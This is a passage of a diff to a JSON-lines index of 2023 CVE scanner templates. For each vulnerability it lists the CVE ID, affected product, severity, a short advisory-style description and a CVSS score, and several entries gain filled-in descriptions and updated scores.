by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"} +{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} +{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} +{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} +{"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"high","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} +{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"} {"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"} -{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"high","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"} -{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"} +{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"critical","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"} +{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"} +{"ID":"CVE-2023-3460","Info":{"Name":"Ultimate Member \u003c 2.6.7 - Unauthenticated Privilege Escalation","Severity":"critical","Description":"The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3460.yaml"} {"ID":"CVE-2023-34659","Info":{"Name":"JeecgBoot 3.5.0 - SQL Injection","Severity":"critical","Description":"jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34659.yaml"} -{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} -{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} -{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} -{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} +{"ID":"CVE-2023-34751","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user\u0026page=groups\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34751.yaml"} +{"ID":"CVE-2023-34752","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings\u0026page=lang\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34752.yaml"} +{"ID":"CVE-2023-34753","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings\u0026page=tmpl\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34753.yaml"} +{"ID":"CVE-2023-34755","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34755.yaml"} +{"ID":"CVE-2023-34756","Info":{"Name":"Bloofox v0.5.2.1 - SQL Injection","Severity":"critical","Description":"Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings\u0026page=charset\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34756.yaml"} +{"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"} +{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} +{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} +{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} +{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} +{"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} +{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} +{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} +{"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"} +{"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} +{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} +{"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"} +{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} +{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} +{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"} +{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} +{"ID":"CVE-2023-3710","Info":{"Name":"Honeywell PM43 Printers - Command Injection","Severity":"critical","Description":"Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3710.yaml"} +{"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"} +{"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"} +{"ID":"CVE-2023-37270","Info":{"Name":"Piwigo 13.7.0 - SQL Injection","Severity":"high","Description":"Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37270.yaml"} +{"ID":"CVE-2023-37462","Info":{"Name":"XWiki Platform - Remote Code Execution","Severity":"high","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37462.yaml"} +{"ID":"CVE-2023-37474","Info":{"Name":"Copyparty \u003c= 1.8.2 - Directory Traversal","Severity":"high","Description":"Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-37474.yaml"} +{"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"} +{"ID":"CVE-2023-37629","Info":{"Name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","Severity":"critical","Description":"Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37629.yaml"} +{"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"} +{"ID":"CVE-2023-37679","Info":{"Name":"NextGen Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37679.yaml"} +{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} +{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} +{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} +{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} +{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} +{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} +{"ID":"CVE-2023-38433","Info":{"Name":"Fujitsu IP Series - Hardcoded Credentials","Severity":"high","Description":"Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38433.yaml"} +{"ID":"CVE-2023-3844","Info":{"Name":"MooDating 1.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3844.yaml"} +{"ID":"CVE-2023-3845","Info":{"Name":"MooDating 1.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3845.yaml"} +{"ID":"CVE-2023-3846","Info":{"Name":"MooDating 1.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3846.yaml"} +{"ID":"CVE-2023-3847","Info":{"Name":"MooDating 1.2 - Cross-Site scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3847.yaml"} +{"ID":"CVE-2023-3848","Info":{"Name":"MooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3848.yaml"} +{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"} +{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"} +{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} +{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} +{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"} +{"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"} +{"ID":"CVE-2023-39110","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39110.yaml"} +{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"} +{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"} +{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} +{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} +{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"} +{"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"} +{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"} +{"ID":"CVE-2023-39676","Info":{"Name":"PrestaShop fieldpopupnewsletter Module - Cross Site 